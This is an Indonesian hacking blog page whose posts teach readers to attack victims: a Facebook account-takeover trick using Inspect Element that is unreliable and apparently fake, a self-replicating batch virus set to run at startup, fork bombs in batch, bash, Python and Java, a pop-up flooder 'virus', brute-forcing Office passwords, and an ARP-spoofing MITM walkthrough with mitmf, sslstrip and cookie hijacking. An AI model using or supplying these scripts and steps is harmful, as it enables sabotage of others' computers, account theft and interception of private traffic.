Selasa, 21 Mei 2019

Cara Hack Facebook Dengan Bug Html Inspect

0 komentar
Membicarakan masalah hack facebook, saat ini memang cara yang satu ini lagi banyak-banyaknya dicari oleh para pengguna internet. Namun jika dilihat secara proseduralnya, jika kalian memang ingin mendalami dunia hacking, terlebih dahulu kalian harus kuasai bahasa pemrograman seperti java, css, phyton, html, dll.

Jika memang kalian tidak memahami bahasa pemrograman secara keseluruhan baik itu open book maupun outside the head, dalam trik ini saya akan sedikit membagikan sedikit trik dengan memanfaatkan bug html pada facebook, namun sebelumnya perlu kalian ketahui bahwa cara ini terkadang tidak bisa berjalan dengan baik disetiap perangkat

Cara Hack Facebook Dengan Bug Html

  • Silahkan kalian masuk ke situs facebook
  • Kemudian centang bagian menu lupa akun 
  • Kemudian silahkan kalian masukkan alamat email atau username korban yang menjadi target kalian, dan silahkan klik tombol cari
  • Setelah itu kalian akan mendapatkan notif seperti gambar dibawah ini, pilih kirim kode ke email atau no telepon kemudian klik tombol lanjutkan .
  • Selanjutnya kalian akan diarahkan pada halaman input kode yang akan diberikan facebook, ditahap ini silahkan kalian klik kanan pada bagian kotak kode tersebut kemudian pilih inspect element atau Inspeksi.
  • Setelah itu, silahkan kalian tekan icon mouse dibagian atas layar inspect, kemudian arahkan mouse kalian ke bagian kode html tertentu hingga tampilan di facebook menjadi terblok seperti gambar dibawah ini, kode tersebut biasanya diawali dengan <div class="mvl ptm
  • Setelah kode tersebut ditemukan, silahkan kalian klik kode tersebut kemudia lakukan klik kanan dan pilih menu Edit as HTML .
  • Selanjutnya kalian akan diarahkan ke kotak edit html, dan silahkan kalian blok semua kode yang ada dikotak tersebut dengan menekan tombol CTRL + A kemudian hapus semua kode tersebut dan ganti kode tersebut dengan kode dibawah ini .
  • Setelah kode kalian salin dikotak tersebut silahkan kalian klik dibagian luar atas kotak tersebut tepatnya di daerah kode <input type="hidden" . . . 
  • Close tampilan console inspect element, dan halaman pun akan menjadi seperti gambar dibawah ini
  • Silahkan kalian buat kata sandi baru kemudian tekan tombol continue untuk melanjutkan
  • Perlu kalian ingat cara ini terkadang bisa berjalan dengan normal dan kadang juga tidak bisa berjalan dengan baik, karena ini merupakan bug html
  • Selesai semoga bermanfaat untuk kalian semuanya

Continue reading →
Minggu, 07 April 2019

Hacking dengan Overloading Memory

0 komentar
Masih membicarakan masalah tahap awal pada teknik h4cking, jika sebelumnya saya telah menjelaskan bagaimana cara melakukan Bomb Fork dan Application flooder. Pada artikel ini saya akan mencoba menjelaskan bagaimana cara membuat teknik awal untuk melumpuhkan suatu perangkat komputer dengan menggunakan metode gabungan antra fork bomb dengan application flooder, teknik ini biasa dikenal dengan istilah Overloading Memory .

Meskipun pada dasarnya sama-sama berfungsi untuk membebani kapasitas RAM, namun teknik Overloading Memory ini dikalim menjadi suatu teknik dasar dalam dunia h4cking yang cukup populer dan masih banyak digunakan hingga saat ini.

Untuk lebih jelasnya, silahkan kalian lihat kode dibawah ini :
@echo off
:A
set x=%random%
type %0 >> %x%.bat
start %x%.bat
goto:A
Terdapat beberapa keterangan lain yang saya dapatkan dari forum-forum besar h4cking diluar sana, bahwa teknik ini bergantung pada apa yang menghabiskan sebagian besar ruang hard disk atau RAM, file batch ini kemungkinan juga akan mengakibatkan kerusakan yang permanen. Namun, dalam kedua kasus tersebut, komputer sudah dipastikan akan mengalami pasti macet/hang, sistem operasinya mungkin rusak dan pada saat startup berikutnya, sehingga korban akan disambut oleh "Blue Screen Of Death" yang terkenal. Satu-satunya cara untuk menghilangkan virus ini adalah dengan cara install ulang dan memformat hard drive.

(Opsional) Agar file ini dijalankan secara otomatis saat startup, silahkan kalian lakukan hal berikut. 
  • Buat shortcut dari file damage.bat dengan mengklik kanan di atasnya. 
  • Buka menu start, 
  • Di program Open Startup folder dan cukup drag atau cut-paste shortcut ke folder ini. 
  • Virus akan berjalan saat komputer dinyalakan.



sumber : komputerdia.com
Continue reading →

Cara Hack Menggunakan Fork Bomb

0 komentar
Fork Bomb adalah salah satu teknik h4cking yang setara dengan serangan DDoS pada suatu sistem jaringan komputer. Teknik ini sendiri bertujuan untuk menghilangkan atau memenuhi sistem dari memori (RAM), sehingga tidak menyisakan sedikit ruangan apapun untuk aplikasi lain atau operasi vital sistem operasi yang diperlukan agar sistem tetap berjalan, sehingga akan terjadi suatu gejala yang cukup menghawatirkan seperti terjadinya hang. Panjang dari teknik ini hanya 5 karakter, bom fork tidak membahayakan secara permanen untuk komputer, hanya saja ditujukan untuk mengganggu sistem komputer sehingga pelaku dapat menemukan suatu celah.

%0|%0



Kode diatas merupakan salah satu kode yang cukup pendek untuk teknik fork bomb, namun kode diatas memang sangat sulit untuk dipahami, sebagai contoh lainnya silahkan kalian perhatikan kode dibawah ini

:s
start %0
goto s

  • Pada kode diatas diketahui bahwa baris pertama membuat label s.
  • % 0 sebenarnya mengacu pada nama file batch itu sendiri. Dengan memulai% 0 kita menjalankan file yang sama lagi.
  • Dan akhirnya goto s membawa kita kembali ke puncak, membentuk sebuah lingkaran.
  • Jadi setiap kali loop dijalankan, contoh lain dari program yang sama dimulai dan kemudian keduanya berjalan bersamaan dan akan menduplikat dirinya sendiri dan seterusnya.


Setiap program yang menggandakan dirinya sendiri merupakan suatu bentuk pertumbuhan eksponensial yang disebabkan oleh serangan fork bomb ini. Setelah satu iterasi loop berjalan, maka dua program (21) akan dibuat secara otomastis.

Setelah siklus lain, masing-masing keduanya menciptakan dua program lainnya untuk total empat (22). Setelah 10 iterasi secara berkala berhasil menggandakan dirinya, maka kalian memiliki 1024 (210) serangan pada sistem memori (RAM). Setelah 100 iterasi, kalian akan memiliki 2100 = 1,267 miliaran angka dan data yang sangat besar sehingga kalian tidak akan mengetahui apa itu 'nonillion' (It's 1030).



Dengan penjelasan ilustrasi diatas, sudah bisa dipastikan bahwa setiap jaringan komputer yang kalian serang akan mengalami gangguan sistem non-permanen seperti hang. Jika hal ini bisa kalian lakukan sudah pasti kalian akan mendapatkan suatu celah pada sistem komputer tersebut.

Untuk pengetahuan lanjutan, kalian bisa mengenali serangan dari bomb fork yang menggunakan media selain CMD atau Notepad. berikut adalah daftar media dan jenis kode yang sering digunakan untuk melakukan serangan bomb fork :

1. Bash

:(){ :|:& };:

2. Python 

import os
 while 1:
     os.fork()

3. Java

public class ForkBomb
{
  public static void main(String[] args)
  {
    while(true)
    {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}



sumber : komputerdia.com





Continue reading →
Minggu, 17 Maret 2019

Spesifikasi Processor Palsu

0 komentar
Zaman sekarang apalagi untuk para gamers pasti menginginkan melihat processor yang dipakainya berspesifikasi tinggi, apalagi untuk membuat para temannya tercengang. Jika ingin sekedar berlagak kepada teman anda seolah-olah "Nih, Komputer gua edann..." :) , maka anda dapat merubah nama dari spek processor yang anda punya. Ini  merupakan sebuah trik

Baiklah, saya akan mulai penjelasannya :

1. Kita lihat dulu berapa speed procesor yang anda inginkan dan jnis apa processor yang digunakan
2. Buka Run, lalu ketikan regedit
3. Setelah terbuka jendela registry editor, klik segituga kecil pada Hkey_Local_Machine > Hardware Description > System > CentralProcesor > Klik folder 0 / 1

4. Buka file ProcessorName yg di sebelah kanan
5. Silahkan Ganti dan edit nama processor beserta speed dan jenis processor
6. Klik OK

Lalu lihat pada Start > Klik kanan computer > Pilih properties...

Edannn..processornya langsung naik drastis.. Tapi ingat ini hanya nama saja, procesornya sama sekali tidak berubah yaa :)

Continue reading →
Minggu, 10 Maret 2019

Membobol Password Office 2007-2010

0 komentar
Menjebol Password Office 2007-2010
Seperti yang sudah saya janjikan bahwa saya akan memperlihatkan cara membobol password untuk Ms.Office 2007-2010. Pasti dari kalian sudah tahu kan apa itu Ms.Office? Yg ga tau kebangetan hehehe (canda).

Gampang aja sih, kalian dapat menggunakan software yang bernama Advanced Office Password Recovery. Program mantap ini dapat anda gunakan untuk membobol password document office versi 207 keatas. Tapi ada sebuah kekurangan dari software ini, yaitu software ini berbayar (-.-) miris yaaa...Jadi, jika kalian ingin menggunakannya silahkan beli dulu programnya...Eitss sebentar

Berikut saya akan coba jelaskan penggunaan software ini :


Menjebol Password Office 2007-2010
  1. Download Filenya disini. Yah lumayan walaupun software ini trial alias sementara.
  2. Pastikan anda sudah menginstal aplikasi ini
  3. Jalankan kemudian pilih model Recover yang diinginkan. Sebagai contoh saja saya akan memilih Brute Force Attack
  4. Selanjutnya, pilih Open file untuk membuka document yang ada passwordnya
  5. Cari dokumen Office yang anda ingin jebol passwordnya
  6. Tunggu hingga 100% ( Maaf untuk menunggu proses penjebolan ini agak lama)
  7. Beres !!! xD
Nah bagaimana ? Semoga bermanfaat
Continue reading →
Minggu, 03 Maret 2019

Cara Membuat Virus Application Flooder Dengan File Batch

0 komentar
Tidak seperti bom fork yang sudah saya jelaskan pada artikel sebelumnya, "Application flooder" merupakan salah satu jenis serangan pada sistem komputer yang besifat jahil dan sama sekali tidak meninggalkan kerusakan pada perangkat komputer secara permanen, meski secara teknis tidak berbahaya, serangan ini adalah termasuk salah satu serangan virus yang sangat menyebalkan, karena jika file batch ini dijalankan oleh korban maka munculan jendela popup akan terus bermunculan dan tidak bisa di close.



Kode Untuk Membuat Application Flooder



@echo off
:begin
start mspaint
start notepad
start write
start cmd
start explorer
start calc
goto begin


Penjelasan Struktur Kode Application Flooder
  • @echo off - Perintah ini hanya menghentikan suatu perintah agar muncul saat file batch dijalankan. Saat kalian memulai file batch, proses command prompt (cmd.exe) dibuka dan instruksi file batch akan disalurkan melalui kode pada application flooder. Kami menggunakan @echo saat kami tidak ingin memberi tahu pengguna tentang apa yang dilakukan file batch yang sedang berjalan.
  • : Begin - Perintah ini merupakan sebuah label, hal ini bisa dikatakan seperti penanda atau pos pemeriksaan, posisi dalam program yang telah kalian beri nama.
  • Start - Perintah ini digunakan untuk menjalankan sebuah file executable, mirip dengan apa yang terjadi saat kalian mengklik dua kali sebuah aplikasi. 
    Kalian dapat melihat bahwa kalian memiliki banyak perintah dan semuanya dimulai dengan sesuatu yang berbeda. Contoh yang saya berikan ini hanyalah beberapa program default yang disertakan dengan semua instalasi windows, dan pada saat inilah kalian dapat membanjiri sebuah aplikasi atau sistem komputer dengan pop-up yang sangat menyebalkan. 
  • Goto - Kalian harus dengan label yang baru kita definisikan di atas? (: Begin) Dengan menggunakan perintah goto, kalian telah memasukan suatu perintah ke label 'begin', dan program akan melanjutkan eksekusi lain secara otomatis. Jenis serangan ini meruapakn jenis derangan loop tak terbatas. 
Penjelasan ini adalah salah satu virus paling sederhana dan tertua yang masih ada sampai saat ini. tetapi ceritanya belum berakhir sampai disini, dalam kesempatan artikel selanjutnya kalian akan benar-benar mengenal suatu Virus yang diklaim sangat bisa menginfeksi dan membahayakan sistem komputer, tentunya juga dengan cara dan pengerjaan yang lebih rumit. Namun, setidaknya kalian sudah selangkah lebih dekat ke pemahaman yang lebih baik tentang gambaran besarnya.


Sumber : komputerdia.com
Continue reading →
Minggu, 17 Februari 2019

Cara Menyadap Dengan Main In The Middle Attack (MITM)

0 komentar
artikel ini dikutip dari www.komputerdia.com

MITM (kepanjangannya ada di judul) adalah teknik hacking meletakkan dirinya ada di tengah-tengah dua perangkat yang sama-sama berkomunikasi. Karna hacker ada di tengah-tengah komunikasi, ini bisa dipastikan bahwa pelaku dapat melakukan sebuah pembacaan, memodifikasi atau juga mereka bisa melakukan modifikasi / pencekalan terhadap paket yang nantinya akan dikirim atau diterima kedua perangkat tersebut.


Hasil dari tehnik h*cking man in the middle ini yaitu penyadapan informasi serta pencurian password (kata sandi).


Sebelum kalian menuju trik dibawah, kalian harus belajar dulu mengenai apa itu ARP, Mac Address, IP, dll nya


Daripada gua jelasin panjang lebar, mending kita langsung ke trik-triknya dibawah berikut ini:





MITM bekerja dengan mengeksploitasi ARP (addresss resolution protocol). ARP ini adalah protokol yang bertugas untuk menerjemahkan peng-alamatan dari IP Address menjadi suatu MAC Address. 

Pada intinya komunikasi jaringan pada tingkat bawah memakai Mac Address sebagai identitas antar piranti, hingga jika table ARP nya di modifikasi oleh seorang h*cke, maka pengiriman data kemungkinan besar akan sangat bisa dimanipulasi dengan maksud agar kiriman tersebut bisa  salah arah.

Pada Windows, kalian bisa mengecek table ARP dengan mengetikkan perintah arp -a di command prompt (cmd). Didalamnya ada catatan baris alamat IP serta Mac Address dari semua computer yang tersambung dengan jaringan yang kalian miliki. Sebagai contoh, silahkan kaliat cermati gambar dibawah ini yang menggambarkan perbedaan rute pengiriman data sebelum dan sesudah dilakukannya serangan MITM (Main In The Middle) .



Gambar diatas adalah ilustrasi sebelum MITM bekerja, tapi jika MITM sudah diluncurkan maka gambar akan tampak seperti dibawah ini


Hal ini disebabkan oleh ARP, karena pada dasarnya ARP sendiri mempunyai dua kekurangan yang bisa dimanfaatkan oleh seorang H*cker, yakni : 


  • Setiap ARP Request atau ARP Respon senantiasa Trusted (diakui) ; 
  • Client bisa terima respon bahkan juga bila mereka tidak kirim sebuah request. 
Tiap-tiap device ketika baru tersambung ke satu jaringan akan selalu  ajukan pertanyaan “siapa routernya? ” kemudian sebuah router juga akan merespon “Saya adalah routernya”. Bersamaan dengan itu maka tercatatlah info IP Address serta Mac Address di ARP Table. 


AYOK KITA MEMULAI PENYERANGAN 


HARUS DIINGAT OS yang digunakan wajib os berbasis linux(ubuntu, dll), namun jika kalian menggunakan operating sytem windows, sebagai opsinya kalian bisa menggunakan linux via Virtual Box.

  • Pastikan kalian menggunakan Operating system Linux
  • Download Tools Man In The Middle Framework (MITMf)
  • Setelah kalian mendapatkan tools tersebut, pastikan kalian telah masuk dalam jaringan korban, untuk masuk kejaringan si korban kalian bisa menggunakan perintah dibawah ini

  • mitmf –arp –spoof -gateway [ip router] -targets [ip target]

    Contoh : mitmf –arp –spoof -gateway 192.168.1.1 -targets 192.168.1.1











  • Langkah selanjutnya, silahkan kalian aktifkan IP Forward dengan cara mengedit file seperti dibawah ini


  • /proc/sys/net/ipv4/ip_forward
  •  untuk awal 0 (tidak aktif) silahkan kalian ubah menjadi 1 (aktif). hal ini dilakukan agar paket yang tidak ditujukan untuk perangkat kalian dapat diteruskan ke perangkat target (korban).
  • Saat tools MITMF ini digerakkan, maka dengan automatis akan melaksanakan serangan seperti yang diterangkan di atas (menipu client serta menipu router) sekaligus menggerakkan paket snifing dengan kata lain penyadapan. paket yang disadap juga akan tertulis langsung di terminal. 
  • Info sensitif seperti username serta password juga akan terlihat jadi text bulat (tanpa ada enkripsi) bila website yang dibuka tidak memakai ssl (https). 
  • Contoh, Pada browser google chrome, korban mengakses halaman login seuatu situsserta mengisikan username dan password, karna website itu tidak memakai https jadi username serta password di kirim tanpa ada enkripsi, paket yang memiliki kandungan username serta password tadi juga akan melalui piranti h*cker terlebih dulu hingga akan terbaca oleh piranti hacker tersebut. 
  • Umumnya website situs besar memakai ssl (website https) supaya lebih aman, fungsinya sudah pasti untuk mengenkripsi semuanya data supaya tidak dapat disadap. Hebatnya MITMF menggerakkan program sslstrip dengan automatis. SSLstrip yaitu program yang bisa dipakai untuk mendowngrade https jadi http. Walau demikian website situs besar seperti facebook memakai keamanan lain yang memaksa supaya tetap memakai https, namun terkadang situs besar tersebut juga bisa kita kelabui dengan cara ini .
  • Tetapi apa yang terjadi bila target memakai feature remember me?. Memakai feature “remember me” akan membuat kita login automatis memakai cookie. Dalam keadaan ini password serta username tidak di kirim ke server hingga H*cker juga tidak bisa lihat passwordnya. 
  • Login memakai cookie nyatanya tetaplah berbahaya karna cookie itu bisa dicuri. Maka dengan demikian h*cker tersebut juga dapat mengambil cookie nya lantas menggunakan cookie tersebut di browser mereka. Langkah tersebut buat Hacker bisa login tanpa harus mengetahui username serta password target. bukankan hal ini menjadi lebih simpel dan praktis. 
  • Untuk mengambil cookie pada browser korban, seorang hacker juga membutuhkan tiga program yang dijalankan sekaligus yakni : 
    1. Mitmf untuk man in the middle, 
    2. Farred untuk mengambil cookie 
    3. Hamster untuk inject cookies ke browser kali linux
  • Namun perlu kalian ketahui bahwa Cara H*cker untuk melakukan teknik ini tentu berlainan dengan cara yang saya beritahukan,  karna terdapat beberapa tool dengan peranan yang sama, jadi bisa disimpulkan bahwa masih banyak cara yang bisa kalian lakukan diluar artikel yang saya bagikan ini.
  • Untuk cara lebih mendalamnya, silahkan kalian mencari informasi diluar artikel saya ini, karena untuk melanjutkan ke hal yang lebih dalam tentunya saya sudah melanggar kode etik sebagai publisher
  • Saya bisa meyakinkan jika tahap finishing bisa kalian lakukan dengan kemampuan yang kalian miliki
Continue reading →